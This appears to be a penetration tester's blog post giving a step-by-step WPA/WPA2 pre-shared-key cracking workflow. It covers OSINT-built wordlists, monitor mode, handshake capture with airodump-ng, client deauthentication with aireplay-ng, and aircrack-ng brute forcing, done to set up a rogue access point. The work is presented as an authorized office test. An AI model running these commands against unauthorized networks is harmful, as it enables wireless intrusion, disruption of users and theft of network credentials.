I was given the opportunity to run some tests against the wireless infrastructure at my office. The actual scenario is to deploy a rogue access point and start gathering intel on the organization. But I decided to take this a step further and do some pre-work to make a convincing rogue AP. What follows is my initial framework that I developed researching how to crack a WPA/WPA2 pre-shared key network. I’ll revisit this and improve on it as I gain more experience.
The goal of this exercise is the gain the pre-shared key used on the WPA/WPA2 wireless network. This key will be used to setup a realistic looking rogue access point.
- Build your Word Lists for brute forcing
- Grab some of the password dumps available on the internet
- OSINT your target(s) to build a list of words and phrases commonly used to build passwords (family and pet names, important dates like birthdays, favorite places, etc.)
- once you determine website(s), use CEWL to harvest possible wordlist entries
- Sort and filter your list to remove duplicates.
sort file > newfileto alpha sort only
sort file | uniq[-i to ignore case if you want] > newfile
- put anything you think might have a higher probability of success near the front of the wordlist.
- Use Mentalist to generate alternative/mangled words based on your base word lists.
The word lists you generate can likely be re-used for other bruteforcing attacks against the target.
Get the WPA Authentication
- determine wireless interface chipset/capabilities (if you do not already know) * needs to allow RFMON
lspci -vvto find the card/driver info
- Or the old standby - open the case and look at the card’s labelling.
iwconfigto get interface name (e.g. wlan0)
airmon-ng check kill- what exactly does this do besides kill the supplicant?
airmon-ng start wlan0- stops the interface, then starts wlan0mon monitoring interface
- there may be a better way to do this by manually stopping everything - need to investigate more
airodump-ng wlan0monto survey to find the available networks. Look for what you know or suspect is the clients.
- Be cautious about neighboring wireless networks you are not authorized to test.
- Could use
airodump-ng -essid [clientssid] wlan0monif you already know the ssid being used to narrow things down.
- Once you have found the target make note the BSSID and channel, then hit Ctrl-C to stop the monitor.
airodump-ng -c [channel] --bssid [target-bssid] -w /path/to/capture/tocreates the required monitoring files.
- Watch for a bit and make sure this ap is active (if there are multiple ap’s, it might not be.)
- Note the client MAC for a few of the stronger clients being actively used
- Leave this terminal open for now to determine if you caught the WPA handshake (note will display in the top line of airodump-ng)
- Open a new terminal to deauth a client to try and catch the reauth
aireplay-ng -0 2 -a [target-bssid] -c [target-client]To try force deauth
- I had problems using -0 10 or higher when trying to grab a client from a multi-ap network on a cisco wireless controller. There may have been some anti-hacking protections coming into place…need to research.
- Cross your fingers and hope the client reauths to the same AP.
- If you do not catch the first client reauth, try the second or try again. Just try not to be too obvious and make problems for the client.
- If you cannot catch the WPA auth, try look at troubleshooting in Sunny Hoi’s post mentioned below.
- If you successfully catch the WPA authenciation, you can shut down the capture.
- You may need to reboot kali before you can get back on the wireless as a client. (Is there another way?)
Cracking the WPA Password
- Pull the capture files down to your cracking machine if it is different from your capture machine.
- aircrack-ng -a2 -b [target-bssid] -w /path/to/word/list /path/to/capture.cap
- let it churn until it finds the password (or not)
Wireless interface cards used successfully:
- Intel Dual Band Wireless-AC 7260 7260NGW FCC ID PD97260NGU * The card worked moderately well on both bands, but it seemed to have issues when the capture ran for more than 15-20 minutes.
Credit Where Credit is Due
- Overall Process - Sunny Hoi has an excellent guide for WPA cracking using Kali. In fact, most of this document is based on it. I strongly recommend you give this link a detailed read.
- Building custom word lists - Null-Byte has a couple great write-ups on building custom wordlists with OSINT, CUPP and Mentalist and scraping a website for words using CeWL.